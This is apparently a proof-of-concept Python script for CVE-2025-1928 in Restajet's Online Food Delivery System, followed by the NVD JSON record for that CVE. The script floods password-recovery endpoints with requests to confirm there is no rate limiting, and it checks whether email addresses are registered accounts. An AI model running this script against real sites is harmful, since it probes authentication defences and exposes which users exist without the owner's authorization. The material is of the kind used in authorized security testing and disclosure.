CVE-2025-1928

#!/usr/bin/env python3 """ CVE-2025-1928 PoC - Restajet Online Food Delivery System Password Recovery Exploitation Note: This PoC is for educational and authorized testing purposes only. """ import requests import time import sys class CVE2025_1928_PoC: def __init__(self, target_url, target_email=None): self.target_url = target_url.rstrip('/') self.target_email = target_email self.session = requests.Session() self.attempt_count = 0 def check_rate_limit(self): """ Check if the password recovery endpoint has rate limiting """ endpoints = [ '/forgot-password', '/password-reset', '/account/recover', '/user/forgot-password', '/api/password/forgot' ] print(f"[*] Testing password recovery endpoints for rate limiting...") for endpoint in endpoints: url = f"{self.target_url}{endpoint}" print(f"\n[*] Testing: {url}") for i in range(10): try: headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36' } data = {'email': self.target_email or f'test{i}@example.com'} response = self.session.post(url, data=data, headers=headers, timeout=10) self.attempt_count += 1 print(f" Request {i+1}: Status={response.status_code}, " f"Response time={response.elapsed.total_seconds():.3f}s") # Check for rate limit response if response.status_code == 429: print(f"[+] Rate limiting detected on {endpoint}") return True elif 'too many requests' in response.text.lower(): print(f"[+] Rate limit message found on {endpoint}") return True time.sleep(0.5) except requests.exceptions.RequestException as e: print(f" Error: {e}") continue print("\n[!] WARNING: No rate limiting detected on password recovery endpoints!") print(f"[!] Made {self.attempt_count} requests without any blocking.") return False def enumerate_users(self, email_list): """ Test for user enumeration via password recovery """ print(f"\n[*] Testing for user enumeration vulnerability...") endpoint = f"{self.target_url}/forgot-password" results = {} for email in email_list: try: response = self.session.post(endpoint, data={'email': email}, timeout=10) # Analyze response for user enumeration if 'not found' in response.text.lower() or 'does not exist' in response.text.lower(): results[email] = 'NOT_EXISTS' print(f" [-] {email}: User does not exist") elif 'sent' in response.text.lower() or 'email' in response.text.lower(): results[email] = 'EXISTS' print(f" [+] {email}: User EXISTS - vulnerable to enumeration!") else: results[email] = 'UNKNOWN' print(f" [?] {email}: Unknown response") except Exception as e: print(f" [!] Error testing {email}: {e}") return results def run_exploit(self): """ Main exploitation routine """ print("=" * 60) print("CVE-2025-1928 PoC - Restajet Online Food Delivery System") print("Improper Restriction of Excessive Authentication Attempts") print("=" * 60) print(f"[*] Target: {self.target_url}") print(f"[*] Starting vulnerability assessment...\n") # Check for rate limiting vulnerability rate_limit_exists = self.check_rate_limit() if not rate_limit_exists: print("\n[!] VULNERABLE: No rate limiting detected!") print("[*] This confirms CVE-2025-1928 vulnerability") # Test user enumeration if email provided if self.target_email: self.enumerate_users([self.target_email]) print("\n[*] Assessment complete.") print("[*] Recommendation: Implement rate limiting and account lockout mechanisms") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-1928.py <target_url> [email]") print("Example: python cve-2025-1928.py http://target.com [email protected]") sys.exit(1) target = sys.argv[1] email = sys.argv[2] if len(sys.argv) > 2 else None poc = CVE2025_1928_PoC(target, email) poc.run_exploit()

{"cve": {"id": "CVE-2025-1928", "sourceIdentifier": "[email protected]", "published": "2025-12-19T13:16:03.313", "lastModified": "2026-03-26T08:16:19.620", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Restriction of Excessive Authentication Attempts vulnerability in Restajet Information Technologies Inc. Online Food Delivery System allows Password Recovery Exploitation.This issue affects Online Food Delivery System: through 19122025. NOTE: The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Vulnerabilidad de restricción inadecuada de intentos de autenticación excesivos en el sistema de entrega de comida en línea de Restajet Information Technologies Inc. permite la explotación de recuperación de contraseña. Este problema afecta al sistema de entrega de comida en línea: hasta el 19122025. NOTA: Se contactó al proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:restajet:online_food_delivery_system:-:*:*:*:*:*:*:*", "matchCriteriaId": "D9645287-A3CA-4036-B2DB-513F54F58AE6"}]}]}], "references": [{"url": "https://www.usom.gov.tr/bildirim/tr-25-0469", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}